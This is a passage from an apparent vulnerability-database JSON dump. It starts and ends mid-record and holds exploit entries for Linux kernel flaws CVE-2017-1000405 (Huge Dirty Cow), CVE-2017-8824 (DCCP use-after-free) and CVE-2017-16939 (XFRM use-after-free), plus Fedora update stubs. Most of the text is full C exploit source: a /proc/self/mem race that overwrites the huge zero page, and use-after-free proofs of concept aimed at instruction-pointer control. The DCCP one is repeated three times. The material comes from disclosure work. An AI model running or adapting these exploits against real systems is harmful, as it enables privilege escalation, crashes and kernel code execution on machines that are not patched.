PAGE_SIZE; \r\n printf(\"[*] Done 0x%lx bytes\\n\", args.off);\r\n }\r\n \r\n printf(\"[*] Success!\\n\");\r\n \r\nerr_close2:\r\n close(args.mem_fd2);\r\nerr_close1:\r\n close(args.mem_fd1);\r\nerr_free:\r\n free(args.buf_to_write);\r\nerr_unmap2:\r\n munmap(args.thp_chk_map, MAP_SIZE);\r\nerr_unmap1:\r\n munmap(args.thp_map, MAP_SIZE);\r\n \r\n if (ret) {\r\n fprintf(stderr, \"[!] Exploit failed.\\n\");\r\n }\r\n \r\n return ret;\r\n}", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/43199/"}, {"lastseen": "2018-05-24T14:08:25", "description": "Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (2). CVE-2017-1000405. 
Dos exploit for Linux platform", "published": "2017-12-11T00:00:00", "type": "exploitdb", "title": "Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (2)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-1000405"], "modified": "2017-12-11T00:00:00", "id": "EDB-ID:44305", "href": "https://www.exploit-db.com/exploits/44305/", "sourceData": "/*\r\n * The code is modified from https://www.exploit-db.com/exploits/43199/\r\n */\r\n#define _GNU_SOURCE\r\n#include <unistd.h>\r\n#include <sys/mman.h>\r\n#include <err.h>\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n#include <fcntl.h>\r\n#include <sys/stat.h>\r\n#include <sched.h>\r\n#include <pthread.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h>\r\n\r\n#define TRIES_PER_PAGE (20000000)\r\n#define PAGE_SIZE (0x1000)\r\n#define MEMESET_VAL (0x41)\r\n#define MAP_SIZE (0x200000)\r\n#define STRING \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"\r\n#define OFFSIZE ((sizeof(STRING)-1)/sizeof(char))\r\n\r\nstruct args{\r\n int fd;\r\n void *p;\r\n int stop;\r\n off_t off;\r\n char *chp;\r\n};\r\n\r\nvoid *write_thread(struct args *arg) {\r\n for (int i = 0; i < TRIES_PER_PAGE && !arg->stop; i++) {\r\n lseek(arg->fd, (off_t)(arg->chp + arg->off*OFFSIZE), SEEK_SET);\r\n write(arg->fd, STRING, sizeof(STRING));\r\n lseek(arg->fd, (off_t)(arg->chp + arg->off*OFFSIZE), SEEK_SET);\r\n }\r\n return NULL;\r\n}\r\n\r\nvoid *wait_for_success(struct args *arg) {\r\n while(*(arg->chp+arg->off*OFFSIZE) != 'A') {\r\n int i = madvise(arg->p, MAP_SIZE, MADV_DONTNEED);\r\n sched_yield();\r\n }\r\n arg->stop = 1;\r\n return NULL;\r\n}\r\n\r\nint main(void) {\r\n struct args arg;\r\n\r\n arg.off = 0;\r\n \r\n arg.p = mmap((void*)0x40000000, MAP_SIZE, PROT_READ, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);\r\n \r\n if(arg.p == MAP_FAILED)\r\n perror(\"[!] 
mmap()\");\r\n arg.chp = arg.p;\r\n printf(\"mmap address is %p\\n\", arg.p);\r\n madvise(arg.p, MAP_SIZE, MADV_HUGEPAGE);\r\n\r\n arg.fd = open(\"/proc/self/mem\", O_RDWR);\r\n if (arg.fd < 0) {\r\n perror(\"[!] open()\");\r\n return 1;\r\n }\r\n \r\n \r\n while(arg.off < PAGE_SIZE/sizeof(STRING)) {\r\n arg.stop = 0;\r\n pthread_t thread0, thread1;\r\n int ret = pthread_create(&thread0, NULL, (void *)wait_for_success, &arg);\r\n ret |= pthread_create(&thread1, NULL, (void *)write_thread, &arg);\r\n \r\n if (ret) {\r\n perror(\"[!] pthread_create()\");\r\n return 1;\r\n }\r\n \r\n pthread_join(thread0, NULL);\r\n pthread_join(thread1, NULL); \r\n \r\n printf(\"[*] Done 0x%x String\\n\", arg.off);\r\n arg.off++;\r\n }\r\n printf(\"[*] Overwrite a page\\n\");\r\n printf(\"%s\\n\", arg.p);\r\n return 0;\r\n}", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/44305/"}, {"lastseen": "2017-12-08T17:44:27", "description": "Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free. CVE-2017-8824. Dos exploit for Linux platform. Tags: Denial of Service (DoS)", "published": "2017-12-07T00:00:00", "type": "exploitdb", "title": "Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-8824"], "modified": "2017-12-07T00:00:00", "id": "EDB-ID:43234", "href": "https://www.exploit-db.com/exploits/43234/", "sourceData": "/*\r\nThis is an announcement for CVE-2017-8824 which is a use-after-free\r\nvulnerability\r\n\r\nI found in Linux DCCP socket. 
It can be used to gain kernel code execution\r\nfrom unprivileged processes.\r\n\r\n\r\n\r\nYou\u00e2\u20ac\u2122ll find in attachment the proof of concept code and the kernel panic\r\nlog.\r\n\r\n\r\n\r\n####### BUG DETAILS ############\r\n\r\n\r\n\r\nWhen a socket sock object is in DCCP_LISTEN state and connect() system\r\ncall is being called with AF_UNSPEC,\r\n\r\nthe dccp_disconnect() puts sock state into DCCP_CLOSED, and forgets to free\r\ndccps_hc_rx_ccid/dccps_hc_tx_ccid and assigns NULL to them,\r\n\r\nthen when we call connect() again with AF_INET6 sockaddr family, the sock\r\nobject gets cloned via dccp_create_openreq_child() and returns a new sock\r\nobject,\r\n\r\nwhich holds references of dccps_hc_rx_ccid and dccps_hc_tx_ccid of the old\r\nsock object, and this leads to both the old and new sock objects can use\r\nthe same memory.\r\n\r\n\r\n\r\n####### LINKS ############\r\n\r\n\r\n\r\nhttp://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-8824\r\n\r\nhttp://lists.openwall.net/netdev/2017/12/04/224\r\n\r\n\r\n\r\n####### CREDITS ############\r\n\r\n\r\n\r\nMohamed Ghannam\r\n*/\r\n\r\n/*This poc has been tested on my custom kernel reseach in ubuntu 4.10.5, the same thing applies to other versions\r\n * if you don't see RIP control, that means file_security_alloc is not called, so we should look for other similar object\r\n * */\r\n#define _GNU_SOURCE\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <sys/syscall.h>\r\n#include <netinet/in.h>\r\n#include <unistd.h>\r\n#include <pthread.h>\r\n#include <sys/mman.h>\r\n\r\n\r\nint fd1,fd2;\r\nstruct sockaddr_in6 in1,in2;\r\n\r\nint do_uaf()\r\n{\r\n struct sockaddr_in6 cin1,cin2;\r\n\r\n fd1 = socket(0xa,6,0);\r\n\r\n memset(&in1,0,sizeof(in1));\r\n in1.sin6_family = AF_INET6;\r\n in1.sin6_addr = in6addr_loopback;\r\n in1.sin6_port = 0x214e;//htons(0x1000);\r\n bind(fd1,(struct sockaddr*)&in1,sizeof(in1));\r\n\r\n 
listen(fd1,0x1);\r\n\r\n fd2 = socket(0xa,6,0);\r\n\r\n memset(&cin1,0,sizeof(cin1));\r\n cin1.sin6_family = AF_INET6;\r\n cin1.sin6_addr = in6addr_loopback;\r\n cin1.sin6_port = 0x214e;//htons(0x1000);\r\n cin1.sin6_flowinfo = 0;\r\n connect(fd2,(struct sockaddr*)&cin1,sizeof(cin1));\r\n\r\n memset(&cin2,0,sizeof(cin2));\r\n connect(fd1,(struct sockaddr*)&cin2,sizeof(cin2));\r\n memset(&in2,0,sizeof(in2));\r\n\r\n in2.sin6_family = AF_INET6;\r\n in2.sin6_addr = in6addr_loopback;\r\n in2.sin6_port = htons(0x2000);\r\n in2.sin6_flowinfo = 0x2;\r\n in2.sin6_scope_id = 6;\r\n bind(fd2,(struct sockaddr*)&in2,sizeof(in2));\r\n\r\n struct sockaddr_in6 cin3;\r\n memset(&cin3,0,sizeof(cin3));\r\n connect(fd2,(struct sockaddr*)&cin3,sizeof(cin3));\r\n\r\n listen(fd2,0xb1);\r\n\r\n struct sockaddr_in6 cin4;\r\n memset(&cin4,0,sizeof(cin4));\r\n cin4.sin6_family = AF_INET6;\r\n cin4.sin6_port = htons(0x2000);//htons(0x3000);\r\n memset(&cin4.sin6_addr,0,sizeof(struct in6_addr));\r\n cin4.sin6_flowinfo = 1;\r\n cin4.sin6_scope_id = 0x32f1;\r\n connect(fd1,(struct sockaddr*)&cin4,sizeof(cin4));\r\n return fd2;\r\n}\r\n\r\nvoid * alloc_umem(void *addr,size_t size)\r\n{\r\n\r\n addr = mmap((void*)0x100000000,4096,PROT_READ | PROT_WRITE | PROT_EXEC,MAP_SHARED|MAP_ANONYMOUS,-1,0);\r\n if(addr == (char *)-1) {\r\n perror(\"mmap\");\r\n return NULL;\r\n }\r\n return addr;\r\n}\r\nint main(void)\r\n{\r\n char *addr;\r\n\r\n addr = (char *)alloc_umem((void*)0x100000000,4096);\r\n if(addr == NULL)\r\n exit(0);\r\n memset(addr,0xcc,4096);\r\n *(unsigned long *)(addr + 0x79) = 0xdeadbeef; /* RIP control */\r\n\r\n do_uaf();\r\n socket(AF_INET,SOCK_STREAM,0);\r\n close(fd2);\r\n return 0;\r\n}", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/43234/"}, {"lastseen": "2018-02-15T18:54:47", "description": "Linux Kernel (Ubuntu 17.04) - 'XFRM' Local Privilege Escalation. CVE-2017-16939. 
Local exploit for Linux platform", "published": "2017-11-23T00:00:00", "type": "exploitdb", "title": "Linux Kernel (Ubuntu 17.04) - 'XFRM' Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-16939"], "modified": "2017-11-23T00:00:00", "id": "EDB-ID:44049", "href": "https://www.exploit-db.com/exploits/44049/", "sourceData": "## Vulnerability Summary\r\nThe following advisory describes a use-after-free vulnerability found in the Linux kernel that can lead to privilege escalation. The vulnerability was found in the Netlink socket subsystem \u2013 XFRM.\r\n\r\nNetlink is used to transfer information between the kernel and user-space processes. It consists of a standard sockets-based interface for user-space processes and an internal kernel API for kernel modules.\r\n\r\n## Credit\r\nAn independent security researcher, Mohamed Ghannam, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.\r\n\r\n## Vendor response\r\nThe vulnerability has been addressed by patch 1137b5e (\u201cipsec: Fix aborted xfrm policy dump crash\u201d): CVE-2017-16939\r\n\r\n```\r\n 
@@ -1693,32 +1693,34 @@ static int dump_one_policy(struct xfrm_policy *xp, int dir, int count, void *ptr\r\n\r\n static int xfrm_dump_policy_done(struct netlink_callback *cb)\r\n {\r\n- struct xfrm_policy_walk *walk = (struct xfrm_policy_walk *) &cb->args[1];\r\n+ struct xfrm_policy_walk *walk = (struct xfrm_policy_walk *)cb->args;\r\n struct net *net = sock_net(cb->skb->sk);\r\n \r\n xfrm_policy_walk_done(walk, net);\r\n return 0;\r\n }\r\n \r\n+static int xfrm_dump_policy_start(struct netlink_callback *cb)\r\n+{\r\n+ struct xfrm_policy_walk *walk = (struct xfrm_policy_walk *)cb->args;\r\n+\r\n+ BUILD_BUG_ON(sizeof(*walk) > sizeof(cb->args));\r\n+\r\n+ xfrm_policy_walk_init(walk, XFRM_POLICY_TYPE_ANY);\r\n+ return 0;\r\n+}\r\n+\r\n static int xfrm_dump_policy(struct sk_buff *skb, struct netlink_callback *cb)\r\n {\r\n struct net *net = sock_net(skb->sk);\r\n- struct xfrm_policy_walk *walk = (struct xfrm_policy_walk *) &cb->args[1];\r\n+ struct xfrm_policy_walk *walk = (struct xfrm_policy_walk *)cb->args;\r\n struct xfrm_dump_info info;\r\n \r\n- BUILD_BUG_ON(sizeof(struct xfrm_policy_walk) >\r\n- sizeof(cb->args) - sizeof(cb->args[0]));\r\n-\r\n info.in_skb = cb->skb;\r\n info.out_skb = skb;\r\n info.nlmsg_seq = cb->nlh->nlmsg_seq;\r\n info.nlmsg_flags = NLM_F_MULTI;\r\n \r\n- if (!cb->args[0]) {\r\n- cb->args[0] = 1;\r\n- xfrm_policy_walk_init(walk, XFRM_POLICY_TYPE_ANY);\r\n- }\r\n-\r\n (void) xfrm_policy_walk(net, walk, dump_one_policy, &info);\r\n \r\n return skb->len;\r\n @@ -2474,6 +2476,7 @@ static const struct nla_policy xfrma_spd_policy[XFRMA_SPD_MAX+1] = {\r\n \r\n static const struct xfrm_link {\r\n int (*doit)(struct sk_buff *, struct nlmsghdr *, struct nlattr **);\r\n+ int (*start)(struct netlink_callback *);\r\n int (*dump)(struct sk_buff *, struct netlink_callback *);\r\n int (*done)(struct netlink_callback *);\r\n const struct nla_policy *nla_pol;\r\n 
@@ -2487,6 +2490,7 @@ static const struct xfrm_link {\r\n [XFRM_MSG_NEWPOLICY - XFRM_MSG_BASE] = { .doit = xfrm_add_policy },\r\n [XFRM_MSG_DELPOLICY - XFRM_MSG_BASE] = { .doit = xfrm_get_policy },\r\n [XFRM_MSG_GETPOLICY - XFRM_MSG_BASE] = { .doit = xfrm_get_policy,\r\n+ .start = xfrm_dump_policy_start,\r\n .dump = xfrm_dump_policy,\r\n .done = xfrm_dump_policy_done },\r\n [XFRM_MSG_ALLOCSPI - XFRM_MSG_BASE] = { .doit = xfrm_alloc_userspi },\r\n 
@@ -2539,6 +2543,7 @@ static int xfrm_user_rcv_msg(struct sk_buff *skb, struct nlmsghdr *nlh,\r\n\r\n {\r\n struct netlink_dump_control c = {\r\n+ .start = link->start,\r\n .dump = link->dump,\r\n .done = link->done,\r\n };\r\n```\r\n\r\n## Vulnerability details\r\nAn unprivileged user can change the Netlink socket subsystem \u2013 XFRM value sk->sk_rcvbuf (sk == struct sock object).\r\n\r\nThe value can be changed within a specific range via setsockopt(SO_RCVBUF). sk_rcvbuf is the total number of bytes of a buffer receiving data via recvmsg/recv/read.\r\n\r\nThe sk_rcvbuf value is how many bytes the kernel should allocate for the skb (struct sk_buff objects).\r\n\r\nskb->truesize is a variable which keeps track of how many bytes of memory are consumed; in order not to waste memory, the kernel can adjust the skb size at run time.\r\n\r\nFor example, if we allocate a large socket buffer (skb) and we only received a 1-byte packet, the kernel will adjust this by calling skb_set_owner_r.\r\n\r\nBy calling skb_set_owner_r the sk->sk_rmem_alloc (refers to an atomic variable sk->sk_backlog.rmem_alloc) is modified.\r\n\r\n\r\n\r\nWhen we create an XFRM netlink socket, xfrm_dump_policy is called; when we close the socket, xfrm_dump_policy_done is called.\r\n\r\nxfrm_dump_policy_done is called whenever cb_running for the netlink_sock object is true.\r\n\r\nThe xfrm_dump_policy_done tries to clean up an xfrm walk entry which is managed by the netlink_callback object.\r\n\r\n\r\n\r\nWhen netlink_skb_set_owner_r is called (like skb_set_owner_r) it updates the sk_rmem_alloc.\r\n\r\nnetlink_dump():\r\n\r\n\r\nIn the above snippet we can see that the netlink_dump() check fails when sk->sk_rcvbuf is smaller than sk_rmem_alloc (notice that we can control sk->sk_rcvbuf via setsockopt(SO_RCVBUF)).\r\n\r\nWhen this check fails, it jumps to the end of the function and exits with failure, and the value of cb_running is not changed to false.\r\n\r\nnlk->cb_running is true, thus xfrm_dump_policy_done() is 
being called.\r\n\r\n\r\n\r\nnlk->cb.done points to xfrm_dump_policy_done, it worth noting that this function handles a doubly linked list, so if we can tweak this vulnerability to reference a controlled buffer, we could have a read/write what/where primitive.\r\n\r\n## Proof of Concept\r\n\r\nThe following proof of concept is for Ubuntu 17.04.\r\n\r\n```\r\n#define _GNU_SOURCE\r\n#include <string.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <asm/types.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <arpa/inet.h>\r\n#include <linux/netlink.h>\r\n#include <linux/xfrm.h>\r\n#include <sched.h>\r\n#include <unistd.h>\r\n\r\n#define BUFSIZE 2048\r\n\r\n\r\nint fd;\r\nstruct sockaddr_nl addr;\r\n\r\nstruct msg_policy {\r\n struct nlmsghdr msg;\r\n char buf[BUFSIZE];\r\n};\r\n\r\nvoid create_nl_socket(void)\r\n{\r\n fd = socket(PF_NETLINK,SOCK_RAW,NETLINK_XFRM);\r\n memset(&addr,0,sizeof(struct sockaddr_nl));\r\n addr.nl_family = AF_NETLINK;\r\n addr.nl_pid = 0; /* packet goes into the kernel */\r\n addr.nl_groups = XFRMNLGRP_NONE; /* no need for multicast group */\r\n\r\n}\r\n\r\nvoid do_setsockopt(void)\r\n{\r\n int var =0x100;\r\n\r\n setsockopt(fd,1,SO_RCVBUF,&var,sizeof(int));\r\n}\r\n\r\nstruct msg_policy *init_policy_dump(int size)\r\n{\r\n struct msg_policy *r;\r\n\r\n r = malloc(sizeof(struct msg_policy));\r\n if(r == NULL) {\r\n perror(\"malloc\");\r\n exit(-1);\r\n }\r\n memset(r,0,sizeof(struct msg_policy));\r\n\r\n r->msg.nlmsg_len = 0x10;\r\n r->msg.nlmsg_type = XFRM_MSG_GETPOLICY;\r\n r->msg.nlmsg_flags = NLM_F_MATCH | NLM_F_MULTI | NLM_F_REQUEST;\r\n r->msg.nlmsg_seq = 0x1;\r\n r->msg.nlmsg_pid = 2;\r\n return r;\r\n\r\n}\r\nint send_msg(int fd,struct nlmsghdr *msg)\r\n{\r\n int err;\r\n err = sendto(fd,(void *)msg,msg->nlmsg_len,0,(struct sockaddr*)&addr,sizeof(struct sockaddr_nl));\r\n if (err < 0) {\r\n perror(\"sendto\");\r\n return -1;\r\n }\r\n return 0;\r\n\r\n}\r\n\r\nvoid create_ns(void)\r\n{\r\n 
if(unshare(CLONE_NEWUSER) != 0) {\r\n perror(\"unshare(CLONE_NEWUSER)\");\r\n exit(1);\r\n }\r\n if(unshare(CLONE_NEWNET) != 0) {\r\n perror(\"unshared(CLONE_NEWUSER)\");\r\n exit(2);\r\n }\r\n}\r\nint main(int argc,char **argv)\r\n{\r\n struct msg_policy *p;\r\n create_ns();\r\n\r\n create_nl_socket();\r\n p = init_policy_dump(100);\r\n do_setsockopt();\r\n send_msg(fd,&p->msg);\r\n p = init_policy_dump(1000);\r\n send_msg(fd,&p->msg);\r\n return 0;\r\n}\r\n```", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/44049/"}], "fedora": [{"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000405"], "description": "The kernel meta package ", "modified": "2017-12-04T19:05:31", "published": "2017-12-04T19:05:31", "id": "FEDORA:3CCDE601B23D", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: kernel-4.13.16-302.fc27", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000405"], "description": "The kernel meta package ", "modified": "2017-12-04T20:15:47", "published": "2017-12-04T20:15:47", "id": "FEDORA:22E2B607603F", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: kernel-4.13.16-202.fc26", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2017-12-07T22:31:31", "description": "", "published": "2017-12-07T00:00:00", "type": "packetstorm", "title": "Linux Kernel DCCP Socket Use-After-Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-8824"], "modified": "2017-12-07T00:00:00", "id": "PACKETSTORM:145235", "href": "https://packetstormsecurity.com/files/145235/Linux-Kernel-DCCP-Socket-Use-After-Free.html", "sourceData": "`/* \nThis is an announcement for CVE-2017-8824 which is a use-after-free \nvulnerability \n \nI found in Linux DCCP socket. 
It can be used to gain kernel code execution \nfrom unprivileged processes. \n \n \n \nYouall find in attachment the proof of concept code and the kernel panic \nlog. \n \n \n \n####### BUG DETAILS ############ \n \n \n \nWhen a socket sock object is in DCCP_LISTEN state and connect() system \ncall is being called with AF_UNSPEC, \n \nthe dccp_disconnect() puts sock state into DCCP_CLOSED, and forgets to free \ndccps_hc_rx_ccid/dccps_hc_tx_ccid and assigns NULL to them, \n \nthen when we call connect() again with AF_INET6 sockaddr family, the sock \nobject gets cloned via dccp_create_openreq_child() and returns a new sock \nobject, \n \nwhich holds references of dccps_hc_rx_ccid and dccps_hc_tx_ccid of the old \nsock object, and this leads to both the old and new sock objects can use \nthe same memory. \n \n \n \n####### LINKS ############ \n \n \n \nhttp://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-8824 \n \nhttp://lists.openwall.net/netdev/2017/12/04/224 \n \n \n \n####### CREDITS ############ \n \n \n \nMohamed Ghannam \n*/ \n \n/*This poc has been tested on my custom kernel reseach in ubuntu 4.10.5, the same thing applies to other versions \n* if you don't see RIP control, that means file_security_alloc is not called, so we should look for other similar object \n* */ \n#define _GNU_SOURCE \n#include <stdio.h> \n#include <string.h> \n#include <stdlib.h> \n#include <sys/types.h> \n#include <sys/socket.h> \n#include <sys/syscall.h> \n#include <netinet/in.h> \n#include <unistd.h> \n#include <pthread.h> \n#include <sys/mman.h> \n \n \nint fd1,fd2; \nstruct sockaddr_in6 in1,in2; \n \nint do_uaf() \n{ \nstruct sockaddr_in6 cin1,cin2; \n \nfd1 = socket(0xa,6,0); \n \nmemset(&in1,0,sizeof(in1)); \nin1.sin6_family = AF_INET6; \nin1.sin6_addr = in6addr_loopback; \nin1.sin6_port = 0x214e;//htons(0x1000); \nbind(fd1,(struct sockaddr*)&in1,sizeof(in1)); \n \nlisten(fd1,0x1); \n \nfd2 = socket(0xa,6,0); \n \nmemset(&cin1,0,sizeof(cin1)); \ncin1.sin6_family = AF_INET6; 
\ncin1.sin6_addr = in6addr_loopback; \ncin1.sin6_port = 0x214e;//htons(0x1000); \ncin1.sin6_flowinfo = 0; \nconnect(fd2,(struct sockaddr*)&cin1,sizeof(cin1)); \n \nmemset(&cin2,0,sizeof(cin2)); \nconnect(fd1,(struct sockaddr*)&cin2,sizeof(cin2)); \nmemset(&in2,0,sizeof(in2)); \n \nin2.sin6_family = AF_INET6; \nin2.sin6_addr = in6addr_loopback; \nin2.sin6_port = htons(0x2000); \nin2.sin6_flowinfo = 0x2; \nin2.sin6_scope_id = 6; \nbind(fd2,(struct sockaddr*)&in2,sizeof(in2)); \n \nstruct sockaddr_in6 cin3; \nmemset(&cin3,0,sizeof(cin3)); \nconnect(fd2,(struct sockaddr*)&cin3,sizeof(cin3)); \n \nlisten(fd2,0xb1); \n \nstruct sockaddr_in6 cin4; \nmemset(&cin4,0,sizeof(cin4)); \ncin4.sin6_family = AF_INET6; \ncin4.sin6_port = htons(0x2000);//htons(0x3000); \nmemset(&cin4.sin6_addr,0,sizeof(struct in6_addr)); \ncin4.sin6_flowinfo = 1; \ncin4.sin6_scope_id = 0x32f1; \nconnect(fd1,(struct sockaddr*)&cin4,sizeof(cin4)); \nreturn fd2; \n} \n \nvoid * alloc_umem(void *addr,size_t size) \n{ \n \naddr = mmap((void*)0x100000000,4096,PROT_READ | PROT_WRITE | PROT_EXEC,MAP_SHARED|MAP_ANONYMOUS,-1,0); \nif(addr == (char *)-1) { \nperror(\"mmap\"); \nreturn NULL; \n} \nreturn addr; \n} \nint main(void) \n{ \nchar *addr; \n \naddr = (char *)alloc_umem((void*)0x100000000,4096); \nif(addr == NULL) \nexit(0); \nmemset(addr,0xcc,4096); \n*(unsigned long *)(addr + 0x79) = 0xdeadbeef; /* RIP control */ \n \ndo_uaf(); \nsocket(AF_INET,SOCK_STREAM,0); \nclose(fd2); \nreturn 0; \n} \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/145235/lkdccpsocket-uaf.txt"}], "zdt": [{"lastseen": "2018-02-06T01:07:57", "description": "Exploit for linux platform in category dos / poc", "edition": 1, "published": "2017-12-07T00:00:00", "type": "zdt", "title": "Linux Kernel - DCCP Socket Use-After-Free Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-8824"], "modified": "2017-12-07T00:00:00", "href": 
"https://0day.today/exploit/description/29141", "id": "1337DAY-ID-29141", "sourceData": "/*\r\nThis is an announcement for CVE-2017-8824 which is a use-after-free\r\nvulnerability\r\n \r\nI found in Linux DCCP socket. It can be used to gain kernel code execution\r\nfrom unprivileged processes.\r\n \r\n \r\n \r\nYou\u2019ll find in attachment the proof of concept code and the kernel panic\r\nlog.\r\n \r\n \r\n \r\n####### BUG DETAILS ############\r\n \r\n \r\n \r\nWhen a socket sock object is in DCCP_LISTEN state and connect() system\r\ncall is being called with AF_UNSPEC,\r\n \r\nthe dccp_disconnect() puts sock state into DCCP_CLOSED, and forgets to free\r\ndccps_hc_rx_ccid/dccps_hc_tx_ccid and assigns NULL to them,\r\n \r\nthen when we call connect() again with AF_INET6 sockaddr family, the sock\r\nobject gets cloned via dccp_create_openreq_child() and returns a new sock\r\nobject,\r\n \r\nwhich holds references of dccps_hc_rx_ccid and dccps_hc_tx_ccid of the old\r\nsock object, and this leads to both the old and new sock objects can use\r\nthe same memory.\r\n \r\n \r\n \r\n####### LINKS ############\r\n \r\n \r\n \r\nhttp://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-8824\r\n \r\nhttp://lists.openwall.net/netdev/2017/12/04/224\r\n \r\n \r\n \r\n####### CREDITS ############\r\n \r\n \r\n \r\nMohamed Ghannam\r\n*/\r\n \r\n/*This poc has been tested on my custom kernel reseach in ubuntu 4.10.5, the same thing applies to other versions\r\n * if you don't see RIP control, that means file_security_alloc is not called, so we should look for other similar object\r\n * */\r\n#define _GNU_SOURCE\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <sys/syscall.h>\r\n#include <netinet/in.h>\r\n#include <unistd.h>\r\n#include <pthread.h>\r\n#include <sys/mman.h>\r\n \r\n \r\nint fd1,fd2;\r\nstruct sockaddr_in6 in1,in2;\r\n \r\nint do_uaf()\r\n{\r\n struct sockaddr_in6 cin1,cin2;\r\n \r\n fd1 
= socket(0xa,6,0);\r\n \r\n memset(&in1,0,sizeof(in1));\r\n in1.sin6_family = AF_INET6;\r\n in1.sin6_addr = in6addr_loopback;\r\n in1.sin6_port = 0x214e;//htons(0x1000);\r\n bind(fd1,(struct sockaddr*)&in1,sizeof(in1));\r\n \r\n listen(fd1,0x1);\r\n \r\n fd2 = socket(0xa,6,0);\r\n \r\n memset(&cin1,0,sizeof(cin1));\r\n cin1.sin6_family = AF_INET6;\r\n cin1.sin6_addr = in6addr_loopback;\r\n cin1.sin6_port = 0x214e;//htons(0x1000);\r\n cin1.sin6_flowinfo = 0;\r\n connect(fd2,(struct sockaddr*)&cin1,sizeof(cin1));\r\n \r\n memset(&cin2,0,sizeof(cin2));\r\n connect(fd1,(struct sockaddr*)&cin2,sizeof(cin2));\r\n memset(&in2,0,sizeof(in2));\r\n \r\n in2.sin6_family = AF_INET6;\r\n in2.sin6_addr = in6addr_loopback;\r\n in2.sin6_port = htons(0x2000);\r\n in2.sin6_flowinfo = 0x2;\r\n in2.sin6_scope_id = 6;\r\n bind(fd2,(struct sockaddr*)&in2,sizeof(in2));\r\n \r\n struct sockaddr_in6 cin3;\r\n memset(&cin3,0,sizeof(cin3));\r\n connect(fd2,(struct sockaddr*)&cin3,sizeof(cin3));\r\n \r\n listen(fd2,0xb1);\r\n \r\n struct sockaddr_in6 cin4;\r\n memset(&cin4,0,sizeof(cin4));\r\n cin4.sin6_family = AF_INET6;\r\n cin4.sin6_port = htons(0x2000);//htons(0x3000);\r\n memset(&cin4.sin6_addr,0,sizeof(struct in6_addr));\r\n cin4.sin6_flowinfo = 1;\r\n cin4.sin6_scope_id = 0x32f1;\r\n connect(fd1,(struct sockaddr*)&cin4,sizeof(cin4));\r\n return fd2;\r\n}\r\n \r\nvoid * alloc_umem(void *addr,size_t size)\r\n{\r\n \r\n addr = mmap((void*)0x100000000,4096,PROT_READ | PROT_WRITE | PROT_EXEC,MAP_SHARED|MAP_ANONYMOUS,-1,0);\r\n if(addr == (char *)-1) {\r\n perror(\"mmap\");\r\n return NULL;\r\n }\r\n return addr;\r\n}\r\nint main(void)\r\n{\r\n char *addr;\r\n \r\n addr = (char *)alloc_umem((void*)0x100000000,4096);\r\n if(addr == NULL)\r\n exit(0);\r\n memset(addr,0xcc,4096);\r\n *(unsigned long *)(addr + 0x79) = 0xdeadbeef; /* RIP control */\r\n \r\n do_uaf();\r\n socket(AF_INET,SOCK_STREAM,0);\r\n close(fd2);\r\n return 0;\r\n}\n\n# 0day.today [2018-02-05] #", "sourceHref": 
